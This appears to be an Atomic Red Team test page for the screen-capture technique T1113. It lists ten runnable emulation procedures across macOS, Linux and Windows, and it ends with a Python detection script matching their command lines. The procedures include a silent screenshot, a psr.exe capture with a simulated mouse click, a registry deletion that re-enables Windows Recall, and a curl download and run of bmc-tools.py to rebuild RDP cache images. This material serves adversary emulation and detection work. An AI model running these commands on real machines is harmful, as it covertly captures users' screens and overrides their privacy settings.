Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen`, `xwd`, or `screencapture`. (Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
- Atomic Test #1: Screencapture
- Atomic Test #2: Screencapture (silent)
- Atomic Test #3: X Windows Capture
- Atomic Test #4: X Windows Capture (freebsd)
- Atomic Test #5: Capture Linux Desktop using Import Tool
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd)
- Atomic Test #7: Windows Screencapture
- Atomic Test #8: Windows Screen Capture (CopyFromScreen)
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools
Atomic Test #1: Screencapture
Use the screencapture command to collect a full desktop screenshot.
Supported Platforms: macOS
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands (run with `bash`):

```bash
screencapture #{output_file}
```

Cleanup Commands:

```bash
rm #{output_file}
```

Atomic Test #2: Screencapture (silent)
Use the screencapture command to collect a full desktop screenshot.
Supported Platforms: macOS
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands (run with `bash`):

```bash
screencapture -x #{output_file}
```

Cleanup Commands:

```bash
rm #{output_file}
```

Atomic Test #3: X Windows Capture
Use the xwd command to collect a full desktop screenshot and review the file with xwud.
Supported Platforms: Linux
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
| package_checker | Package checking command for Linux (Debian equivalent: `dpkg -s x11-apps`) | string | rpm -q xorg-x11-apps |
| package_installer | Package installer command for Linux (Debian equivalent: `apt-get install x11-apps`) | string | yum install -y xorg-x11-apps |
Attack Commands (run with `sh`):

```sh
xwd -root -out #{output_file}
xwud -in #{output_file}
```

Cleanup Commands:

```sh
rm #{output_file}
```

Dependencies, check prerequisite command:

```sh
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```

Get prerequisite command:

```sh
sudo #{package_installer}
```

Atomic Test #4: X Windows Capture (freebsd)
Use the xwd command to collect a full desktop screenshot and review the file with xwud.
Supported Platforms: Linux
auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd |
Attack Commands (run with `sh`):

```sh
xwd -root -out #{output_file}
xwud -in #{output_file}
```

Cleanup Commands:

```sh
rm #{output_file}
```

Dependencies, check prerequisite command (the two separate checks in the original exit after the first one, so xwud was never tested; both are combined here so that the check only passes when both binaries are present):

```sh
if [ -x "$(command -v xwd)" ] && [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi
```

Get prerequisite command:

```sh
pkg install -y xwd xwud
```

Atomic Test #5: Capture Linux Desktop using Import Tool
Use the import command from ImageMagick to collect a full desktop screenshot.
Supported Platforms: Linux
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands (run with `sh`):

```sh
import -window root #{output_file}
```

Cleanup Commands:

```sh
rm #{output_file}
```

Dependencies, check prerequisite command:

```sh
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
```

Get prerequisite command:

```sh
sudo apt install graphicsmagick-imagemagick-compat
```

Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd)
Use the import command from ImageMagick to collect a full desktop screenshot.
Supported Platforms: Linux
auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | /tmp/T1113_desktop.png |
Attack Commands (run with `sh`):

```sh
import -window root #{output_file}
```

Cleanup Commands:

```sh
rm #{output_file}
```

Dependencies, check prerequisite command:

```sh
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
```

Get prerequisite command:

```sh
pkg install -y ImageMagick7
```

Atomic Test #7: Windows Screencapture
Use the Psr.exe binary (Steps Recorder) to collect screenshots of the user display. The test performs a left mouse click to simulate user behaviour.
Supported Platforms: Windows
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Output file path | path | c:\temp\T1113_desktop.zip |
| recording_time | Time to take screenshots | integer | 5 |
Attack Commands (run with `powershell`):

```powershell
cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
# Redirect to the NUL device; the original "> NULL" would create a file named NULL in the working directory.
cmd /c "timeout #{recording_time} > NUL && psr.exe /stop"
```

Cleanup Commands:

```powershell
rm #{output_file} -ErrorAction Ignore
```

Atomic Test #8: Windows Screen Capture (CopyFromScreen)
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.

[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
Supported Platforms: Windows
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Path where captured results will be placed | path | $env:TEMP\T1113.png |
Attack Commands (run with `powershell`):

```powershell
Add-Type -AssemblyName System.Windows.Forms
$screen = [Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphic = [Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save("#{output_file}")
```

Cleanup Commands:

```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```

Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted
Simulates enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This test assumes that Recall is already explicitly disabled on the host and is subsequently enabled by the adversary.
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis
Supported Platforms: Windows
auto_generated_guid: 5a496325-0115-4274-8eb9-755b649ad0fb
Attack Commands (run with `command_prompt`):

```cmd
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
```

Cleanup Commands:

```cmd
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
```

Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script. This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
Supported Platforms: Windows
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
| Name | Description | Type | Default Value |
|---|---|---|---|
| cache_path | Path to the RDP Cache directory or specific .bmc file | path | $env:LOCALAPPDATA\Microsoft\Terminal Server Client\Cache |
| output_dir | Directory to save reconstructed images | path | $env:TEMP\rdp_screens |
Attack Commands (run with `powershell`):

```powershell
$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null
# python script download
& curl.exe -L $url --output $toolsDir
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }
```

Cleanup Commands:

```powershell
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
```

Dependencies, check prerequisite command:

```powershell
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

Get prerequisite command:

```powershell
Write-Host "Please install Python manually."
```
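As an added example (not part of Atomic Red Team or of any tool named above), the following Python pass scans process command lines for the indicators exercised by the ten tests on this page: the macOS, X11 and ImageMagick utilities, psr.exe, the Recall `DisableAIDataAnalysis` policy value and bmc-tools.py. The rule names, the `classify`/`scan` helpers and the sample events are all constructed here; the Recall rule treats deletion of the value or setting it to 0 as enabling and leaves the `/d 1` cleanup alone.

```python
"""Detection pass over process command lines for the T1113 tests on this page.
Added example, not Atomic Red Team code: rule names, helpers and events are constructed."""
import re

# Indicators drawn from the attack commands above; the rule names are ours.
RULES = [
    ("macos_screencapture", re.compile(r"(^|/)screencapture(\s|$)")),
    ("linux_xwd_root", re.compile(r"(^|/)xwd\b.*\s-root\b")),
    ("linux_imagemagick_import", re.compile(r"(^|/)import\b.*-window\s+root\b")),
    ("windows_psr", re.compile(r"\bpsr(\.exe)?\s+/start\b", re.I)),
    ("windows_copyfromscreen", re.compile(r"CopyFromScreen\s*\(", re.I)),
    ("rdp_bmc_tools", re.compile(r"bmc-tools\.py", re.I)),
]
RECALL_VALUE = re.compile(r"WindowsAI.*\bDisableAIDataAnalysis\b", re.I)

def classify(cmdline):
    """Return the list of indicator names a single command line matches."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if RECALL_VALUE.search(cmdline):
        low = cmdline.lower()
        # Deleting the value, or setting it to 0, turns Recall snapshotting back
        # on; 'reg add ... /d 1' re-disables it and is the test's cleanup step.
        if "reg delete" in low or re.search(r"/d\s+0\b", low):
            hits.append("windows_recall_enabled")
    return hits

def scan(events):
    """events: iterable of (host, cmdline); returns (host, cmdline, hits) for hits only."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, cmdline, hits))
    return findings

# Constructed sample telemetry modelled on the tests above, plus one benign line.
SAMPLE_EVENTS = [
    ("mac01", "screencapture -x /tmp/T1113_desktop.png"),
    ("lnx01", "xwd -root -out /tmp/T1113_desktop.xwd"),
    ("lnx01", "import -window root /tmp/T1113_desktop.png"),
    ("win01", "cmd /c start /b psr.exe /start /output c:\\temp\\T1113_desktop.zip /sc 1 /gui 0"),
    ("win01", 'reg delete "HKCU\\Software\\Policies\\Microsoft\\Windows\\WindowsAI" /v DisableAIDataAnalysis /f'),
    ("win01", 'reg add "HKCU\\Software\\Policies\\Microsoft\\Windows\\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f'),
    ("win02", "python C:\\Temp\\bmc-tools.py -s cache -d out -b"),
    ("lnx02", "python3 -c 'import os'"),  # benign: a Python import, not ImageMagick
]

if __name__ == "__main__":
    for host, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}  <-  {cmd}")
```

Command-line matching of this kind is only a starting point; the psr.exe and CopyFromScreen paths in particular are also reachable without these exact strings, so pair it with file-creation and image-library load telemetry where available.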